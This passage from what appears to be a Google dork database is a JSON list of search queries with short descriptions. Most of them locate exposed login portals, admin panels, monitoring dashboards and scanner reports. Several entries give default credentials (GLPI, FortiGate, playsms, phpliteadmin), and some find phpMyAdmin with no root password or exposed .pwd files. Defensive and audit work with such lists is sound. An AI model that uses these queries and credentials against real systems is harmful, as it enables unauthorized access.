inurl:\"/monitor/monitor.php\"\r\n\r\nThis dork possibly allow to view monitoring device status in Cacti."}, {"dork": "intitle:\"netdata dashboard\" AND intext:\"Costa Tsaousis\"", "description": "# Dork #\r\n\r\nintitle:\"netdata dashboard\" AND intext:\"Costa Tsaousis\"\r\n\r\nThis dork possibly allow to view dashboard."}, {"dork": "intitle:Grapher AND inurl:sensorlist.htm", "description": "# Dork #\r\n\r\nintitle:Grapher AND inurl:sensorlist.htm\r\n\r\nThis dork possibly allow to view network status without authentication."}, {"dork": "intitle:traefik inurl:8080/dashboard", "description": "Traefik Dashboard\r\n\r\n# Google Dork: intitle:traefik inurl:8080/dashboard\r\n# Date: [24-3-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"Nikto Report\" \"OSVDB\"", "description": "# Google Dork: intitle:\"Nikto Report\" \"OSVDB\"\r\n\r\n# Description: Find reports generated by the Nikto vulnerability scanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"Skipfish - scan results browser\"", "description": "# Google Dork: intitle:\"Skipfish - scan results browser\"\r\n\r\n# Description: Find reports generated by Skipfish vulnerability scanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "-site:\"pentest-tools.com\" intext:\"Scan coverage information\" AND \"List of tests\" ext:PDF", "description": "# Google Dork: -site:\"pentest-tools.com\" intext:\"Scan coverage information\"\r\nAND \"List of tests\" ext:PDF\r\n\r\n# Description: Find reports generated by Pentest-Tools.com vulnerability\r\nscanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"ZAP Scanning Report\" + \"Alert Detail\"", "description": "# Google Dork: intitle:\"ZAP Scanning Report\" + \"Alert Detail\"\r\n\r\n# Network or Vulnerability data.\r\n\r\n# Date: 1/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"routeros\" \"sophia\"", "description": "# Google Dork: intitle:\"routeros\" \"sophia\"\r\n\r\n# Date: 22/07/2021 \r\n\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"jaeger UI\" inurl:trace", "description": "# Google Dork: intitle:\"jaeger UI\" inurl:trace\r\n# Date: 21/06/2021\r\n# Network or Vulnerability Data\r\n# Author: Mohammed*_*"}, {"dork": "intitle:\"NETSurveillance WEB\"", "description": "# Google Dork: intitle:\"NETSurveillance WEB\"\r\n# Network or Vulnerability Data\r\n# Date:18/07/2021\r\n# Exploit Author: J. Igor Melo"}], "Pages Containing Login Portals": [{"dork": "intitle:\"MikroTik RouterOS Managing Webpage\"", "description": "This is the front page entry point to a \"Mikro Tik\" Router."}, {"dork": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."}, {"dork": "inurl:\"webadmin\" filetype:nsf", "description": "This is a standard login page for Domino Web Administration."}, {"dork": "intitle:\"Dell Remote Access Controller\"", "description": "This is the Dell Remote Access Controller that allows remote administration of a Dell server."}, {"dork": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "description": "This is the main authentication screen for the ZyXEL Prestige Router."}, {"dork": "filetype:php inurl:\"webeditor.php\"", "description": "This is a standard login portal for the webadmin program."}, {"dork": "inurl:/cgi-bin/sqwebmail?noframes=1", "description": "sQWebmail login portals."}, {"dork": "filetype:cfg login \"LoginServer=\"", "description": "This one finds login servers for the Ultima Online game."}, {"dork": "intitle:\"please login\" \"your password is *\"", "description": "These administrators were friendly enough to give hints about the password."}, {"dork": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "description": "Frontend for SAP Internet Transaction Server webgui service."}, {"dork": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "description": "search to show online Novell Groupwise web access portals."}, {"dork": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "description": "this search will get you on the web administration portal of linux open exchange servers."}, {"dork": "intitle:\"Virtual Server Administration System\"", "description": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus."}, {"dork": "\"OPENSRS Domain Management\" inurl:manage.cgi", "description": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus."}, {"dork": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "description": "Postfix Admin login pages. Duh."}, {"dork": "intitle:\"phpPgAdmin - Login\" Language", "description": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services"}, {"dork": "inurl:/webedit.* intext:WebEdit Professional -html", "description": "WebEdit is a content management system. This is the login portal search."}, {"dork": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "description": "Administration pages for CUPS, The Common UNIX Printing System. Most are password protected."}, {"dork": "intext:\"Mail admins login here to administrate your domain.\"", "description": "Another way to locate Postfix admin logon pages."}, {"dork": "intitle:Group-Office \"Enter your username and password to login\"", "description": "Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online."}, {"dork": "intitle:\"welcome to netware *\" -site:novell.com", "description": "Novell login portals offering various services storage, printing, email or LDAP access"}, {"dork": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "description": "Open groupware is a comprehensive open source groupware project running on all major platforms."}, {"dork": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "description": "These are Kurant StoreSense admin logon pages."}, {"dork": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "description": "Another way to find the web administration portal of linux open exchange servers."}, {"dork": "inurl:\"suse/login.pl\"", "description": "More Suse login portals, mostly Open Exchange."}, {"dork": "inurl:webmail./index.pl \"Interface\"", "description": "Webmail system which reveals that the website is hosted by vDeck"}, {"dork": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "description": "Free Perl Guestbook (FPG) administration page. Only a password is needed to logon."}, {"dork": "intitle:\"ListMail Login\" admin -demo", "description": "Listmail mailinglist manager admin logon"}, {"dork": "intitle:asterisk.management.portal web-access", "description": "VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings."}, {"dork": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time."}, {"dork": "intitle:\"inc. vpn 3000 concentrator\"", "description": "This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief."}, {"dork": "intext:\"vbulletin\" inurl:admincp", "description": "vBulletin Admin Control Panel"}, {"dork": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "description": "some version of ilohamail are vulnerable."}, {"dork": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "description": "Real Estate software package, with the admin login screen"}, {"dork": "intitle:\"WorldClient\" intext:\"\u00a9 (2003|2004) Alt-N Technologies.\"", "description": "MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs."}, {"dork": "site:*/lost_pass.php", "description": "Login portal:\r\n\r\nsite:*/lost_pass.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl::2082/frontend -demo", "description": "This allows you access to CPanel login dialogues/screens."}, {"dork": "inurl:Citrix/MetaFrame/default/default.aspx", "description": "MetaFrame Presentation Server"}, {"dork": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "description": "Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers."}, {"dork": "inurl:exchweb/bin/auth/owalogon.asp", "description": "Outlook Web Access Login POrtal"}, {"dork": "inurl:textpattern/index.php", "description": "Login portal for textpattern a CMS/Blogger tool."}, {"dork": "\"This section is for Administrators only. If you are an administrator then please\"", "description": "Nothing special, just one more set of login pages, but the \"Administrators only\" line is a classic."}, {"dork": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "description": "Pretty standered login pages, they all have various differences but it appears that they use the same script or software."}, {"dork": "intitle:\"AlternC Desktop\"", "description": "This finds the login page for AlternC Desktop I dont know what versions."}, {"dork": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "description": "This finds all versions of the inspanel login page."}, {"dork": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "description": "This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork."}, {"dork": "inurl:csCreatePro.cgi", "description": "Create Pro logon pages."}, {"dork": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "description": "iCMS - Content Management System...Create websites without knowing HTML or web programming."}, {"dork": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "description": "qmail mail admin login pages.There are several vulnerabilities relating to this software"}, {"dork": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "description": "Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO."}, {"dork": "\"You have requested to access the management functions\" -.edu", "description": "Terracotta web manager admin login portal."}, {"dork": "\"Please authenticate yourself to get access to the management interface\"", "description": "Photo gallery managment system login"}, {"dork": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "description": "There seems to be several vulns for qmail."}, {"dork": "inurl:/modcp/ intext:Moderator+vBulletin", "description": "there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards."}, {"dork": "intitle:\"i-secure v1.1\" -edu", "description": "I-Secure Login Pages"}, {"dork": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "description": "Aimoo Login Pages. \"Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!\""}, {"dork": "intitle:\"EXTRANET * - Identification\"", "description": "WorkZone Extranet Solution login page. All portals are in french or spanish I belive."}, {"dork": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "description": "This search finds many different Extranet login pages."}, {"dork": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "description": "HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment."}, {"dork": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "description": "Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability."}, {"dork": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "description": "iLo and related login pages !? Whoops.."}, {"dork": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "description": "Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login."}, {"dork": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "description": "sift Group makes a web site administration product which can be accessed via a web browser. This dork locates their admin login."}, {"dork": "intitle:\"b2evo > Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\" -demo -site:b2evolution.net", "description": "b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login."}, {"dork": "\"Emergisoft web applications are a part of our\"", "description": "Hospital patient management system, in theory it could be dangerous."}, {"dork": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "description": "betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins."}, {"dork": "intitle:Ovislink inurl:private/login", "description": "Ovislink vpn login page."}, {"dork": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "description": "Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up."}, {"dork": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "description": "The page to change admin passwords. Minor threat but the place to start an attack."}, {"dork": "intitle:\"EZPartner\" -netpond", "description": "EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins."}, {"dork": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg", "description": "RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer."}, {"dork": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "description": "This dork finds firewall/vpn products from fiber logic. They only require a one-factor authentication."}, {"dork": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp -\"Response.Buffer = True\" -javascript", "description": "Ecommerce templates makes a online shopping cart solution. This search finds the admin login."}, {"dork": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url."}, {"dork": "inurl:\"php121login.php\"", "description": "\"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!\""}, {"dork": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "description": "\"TrackerCam\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.\""}, {"dork": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "description": "\"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.\""}, {"dork": "(intitle:\"rymo Login\")|(intext:\"Welcome to rymo\") -family", "description": "\"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.\""}, {"dork": "intitle:\"Employee Intranet Login\"", "description": "Intranet login pages by decentrix.com"}, {"dork": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "description": "Customer login pages\"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.\""}, {"dork": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "description": "More SquirrelMail Logins"}, {"dork": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "description": "Logins for Forums powered by UBB.threads"}, {"dork": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url."}, {"dork": "intitle:ARI \"Phone System Administrator\"", "description": "Login page for \"Asterisk Recording Interface\" (ARI)."}, {"dork": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "description": "IBM e-server's login pages.\nAuthor: DigiP"}, {"dork": "inurl:/dana-na/auth/", "description": "Juniper SSL\nAuthor: bugbear"}, {"dork": "inurl:src/login.php", "description": "Locates SquirrelMail Login Pages\nAuthor: 0daydevilz"}, {"dork": "\"Login Name\" Repository Webtop intitle:login", "description": "Search for login screen of default instance: Documentum Webtop by EMC"}, {"dork": "\"Welcome to Sitecore\" + \"License Holder\"", "description": "Sitecore CMS detection."}, {"dork": "Please-logon \"intitle:zarafa webaccess \"", "description": "Zarafa Webaccess logon pages.\nGreetings,\nAlrik."}, {"dork": "inurl:phpliteadmin.php", "description": "The default password is 'admin'"}, {"dork": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "description": "Gives sites with default username root and no password\n-- \nnitish mehta"}, {"dork": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "description": "Reported by: Jasper Briels"}, {"dork": "intitle:\"VNC Viewer for Java\"", "description": "VNC Viewer for Java\n~4N6 Security~"}, {"dork": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "description": "Finds cPanel login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "inurl:5000/webman/index.cgi", "description": "Synology nas login"}, {"dork": "intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "description": "#Summary: ZyWall Firewall login portal\n#Category: Various Online Devices\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Login - OTRS\" inurl:pl", "description": "#Summary: OTRS login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "description": "#Summary: Winmail login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "description": "#Summary: VoIP login portals\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "description": "#Summary: Surveillance login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "description": "#Summary: PHP Admin login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:\"/module.php/core/loginuserpass.php\"", "description": "Finds SimpleSAMLphp login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:Admin inurl:login.php site:.co.in", "description": "dork submitted by M4RKM3N aka Osama Mahmood\nrevels admin login panels of sites :)"}, {"dork": "inurl:typo3/install/index.php?mode=", "description": "typo3 install logins\nBruno Schmid"}, {"dork": "intitle:\"Zimbra Web Client Sign In\"", "description": "Open Source Zimbra Webmail Login pages"}, {"dork": "intitle:\"Zimbra Web Client Log In\"", "description": "Open Source Zimbra Webmail Login pages"}, {"dork": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "description": "via Priyal Viroja"}, {"dork": "inurl:Citrix/MetaframeXP", "description": "Servers Citrix web xD.\nBy Rootkit."}, {"dork": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "description": "Type: login portals\nAuthor : botsec0"}, {"dork": "intitle:IBM Lotus iNotes Login", "description": "Thanks,\nXploit"}, {"dork": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "description": "Oracle PeopleSoft Sign-in\nLogins\n-Xploit"}, {"dork": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "description": "Login for Parallels Plesk Panel for Microsoft Windows\n-Xploit"}, {"dork": "inurl:/my.logon.php3?", "description": "f5 Network Remote Access Logins\n-Xploit"}, {"dork": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "description": "Patient Health Portals.\nDecoy"}, {"dork": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "description": "Content Manager Login Pages.\nDecoy"}, {"dork": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "description": "Login for SmarterMail Enterprise\n-Xploit"}, {"dork": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "description": "Blackboard Login Portals.\nDecoy"}, {"dork": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "description": "Canvas login portals.\nDecoy"}, {"dork": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "description": "WinOcular Workspace Login portals.\nDecoy"}, {"dork": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php\n| inurl:.us/wp-login.php"}, {"dork": "intitle:AP Router New Generation | inurl:/home.asp", "description": "Access Point Router Logins\n-Xploit"}, {"dork": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "description": "Numara Software FootPrints Logins\n-Xploit"}, {"dork": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "description": "Roundcube Webmail Login Portals.\nDecoy"}, {"dork": "intitle:\"Mail - AfterLogic WebMail\"", "description": "AfterLogic WebMail Login Portals.\nDecoy"}, {"dork": "intitle:\"Lost Password Reset\" | inurl:/secure/pwreset.php | inurl:/portal/index.php", "description": "Lost Password Reset for Websites.\n-Xploit"}, {"dork": "intitle:\"Microsoft+Outlook+Web+Access+Log+On\" | inurl:/owa/auth/logon.aspx", "description": "Microsoft Outlook Web Logins \n-Xploit"}, {"dork": "ext:html intext:Airties inurl:login.html", "description": "AirTies Modems\next:html intext:Airties inurl:login.html\natawho-sonadam"}, {"dork": "inurl:/welcome.cgi? | p=no-cert", "description": "Another Dork with Remote Logins \n-Xploit"}, {"dork": "inurl:/oam/server/obrareq.cgi | ext:\"encquery\" | ext:\"Portal_Webcenter\"", "description": "Login's for Oracle Access Management\n-Xploit"}, {"dork": "intitle:\"Welcome | PRTG Network Monitor\" inurl:/index.htm", "description": "Login screen for network monitoring system.\nAuthor: Manuel Mancera (@sinkmanu)"}, {"dork": "inurl:\"/,DanaInfo=\"", "description": "Yet another Remote Login Dork.\n-Xploit"}, {"dork": "intitle:\"VOOD - Welcome to Vood Residential Gateway >Login\"", "description": "Multiple VOOD Online Gateways!\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:index.php?app=main intitle:sms", "description": "login portals to playsms webapp\ndefault password admin:admin"}, {"dork": "filetype:pwd intitle:index", "description": "Google dork:\nfiletype:pwd intitle:index\nD0bby"}, {"dork": "inurl:citrix inurl:login.asp -site:citrix.com", "description": "Citrix Login Portals\ninurl:citrix inurl:login.asp -site:citrix.com"}, {"dork": "Zixmail inurl:/s/login?", "description": "Zixmail Secure Email Logon Portals.\n-Xploit"}, {"dork": "inurl:\"/login/login.html\" intitle:\"Greenbone Security Assistant\"", "description": "OpenVAS login page,\nby neon"}, {"dork": "inurl:\"/sgdadmin/\" Secure Global Desktop", "description": "Oracle Secure Global Desktop Console and Administrator Help.\n\"https://sgd\""}, {"dork": "inurl:/?skipANDROID=true intext:\"Pydio Community\"", "description": "Pydio Community, Cloud and Secure FTP server logins.\n-Xploit"}, {"dork": "\"This WebUI administration tool requires scripting support\" intitle:'Login' intext:'Admin Name:' -score", "description": "Pages containing Login Portals\nJuniper Netscreen WebUI login page."}, {"dork": "inurl:forgot.do;jsessionid=", "description": "Forgot password portals\n- Matt - twitter.com/novpn"}, {"dork": "inurl:\".Admin;-aspx }\" \"~Login\"", "description": "Admin Logins\n-Xploit"}, {"dork": "\"Joomla! Administration Login\" inurl:\"/index.php\"", "description": "Finds Joomla admin login pages\nDxtroyer"}, {"dork": "-english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"", "description": "this one is for fortinet firewalls login web based . thanks #th3jackers"}, {"dork": "inurl:\"member.php?action=login\"", "description": "Finds logins powered by MyBB\nDxtroyer"}, {"dork": "\"Log in\" \"Magento is a trademark of Magento Inc.\"", "description": "Finds Magento admin logins\nDxtroyer"}, {"dork": "inurl:\"/siteadmin/index.php\"", "description": "Finds admin control panels\nDxtroyer"}, {"dork": "inurl:\"http://webmail.\"", "description": "Finds various webmail servers.\nDxtroyer"}, {"dork": "intitle:\"Dell SonicWALL - Authentication\"", "description": "Finds tons upon tons of Dell SonicWALL firewall servers\nDxtroyer"}, {"dork": "inurl:\"Login;jsessionid=\"", "description": "Finds generic JS login portals\nDxtroyer"}, {"dork": "intitle:\"Sign in \u00b7 GitLab\"", "description": "Dork: intitle:\"Sign in \u00b7 GitLab\"\nDescription: Find GitLab servers\nAuthor: scumsec"}, {"dork": "intitle:\"Plesk Onyx\" intext:\"Interface language\"", "description": "Dork: intitle:\"Plesk Onyx\" intext:\"Interface language\"\nDescription: Find Plesk Onyx login pages\nAuthor: scumsec"}, {"dork": "inurl:/remote/login?lang=en", "description": "Find FortiGate Firewall's SSL-VPN login portal.\nonce you connected with VPN you will get LAN access.\nif you are lucky try\nuser = test\npass = test@123\nDagalti Kick"}, {"dork": "inurl:index of= %2F /admin login %2F intitle:\"Administration Login -", "description": "Admin Logins for different Web Hosting Companies.\nOther Dorks.\ninurl:index of= %2F /Admin Login %2F\ninurl:\"Admin/Index.aspx?\"\ninurl:\"Admin/Index.aspx?A=LogOut\"\n-Xploit"}, {"dork": "inurl:front/central.php", "description": "GLPI login screen. Default login:\n * glpi/glpi (super-admin)\n * tech/tech\n * postonly/postonly (only for helpdesk)\n * normal/normal\n--\n@verovan"}, {"dork": "intitle:\"Welcome to QNAP Turbo NAS\"", "description": "Login form and options for QNAP products\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar/"}, {"dork": "inurl:login/?next=/admin/ -https -stackoverflow.com -github.com", "description": "inurl:login/?next=/admin/ -https -stackoverflow.com -github.com\nfinds insecured admin logins and Django Admin logins.\nBy Ozzy"}, {"dork": "inurl:\":8006\" and intext:\"Proxmox VE Login\"", "description": "Login portal to Proxmox Virtual Environment.\n---\n@verovan"}, {"dork": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "description": "This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details"}, {"dork": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "description": "[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201cLogon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c your UWYO Domain username* Password \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager"}, {"dork": "(intitle:\"SilkyMail by Cyrusoft International, Inc", "description": "silkyMail is a free internet email client, from www.cyrusoft.com, that runs in your browser. The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(inurl:\"silkymail/imp/login.php3\")http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&btnG=Search"}, {"dork": "inurl:\"/jenkins/login\" \"Page generated\"", "description": "Finds login pages for Jenkins continuous integration servers.\n- Andy G - twitter.com/vxhex"}, {"dork": "Auth inurl:welcome ext:cgi", "description": "A lot of Pages with logins portals.\nEnjoy.\nBy Rootkit."}, {"dork": "inurl:/WebInterface/login.html", "description": "Login Pages for CrushFTP\nMay bring up other programs FTP pages."}, {"dork": "allinurl:\"exchange/logon.asp\"", "description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."}, {"dork": "intitle:\"ColdFusion Administrator Login\"", "description": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."}, {"dork": "inurl:login.cfm", "description": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."}, {"dork": "inurl:\":10000\" intext:webmin", "description": "Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000."}, {"dork": "inurl:login.asp", "description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."}, {"dork": "inurl:/admin/login.asp", "description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."}, {"dork": "\"VNC Desktop\" inurl:5800", "description": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of 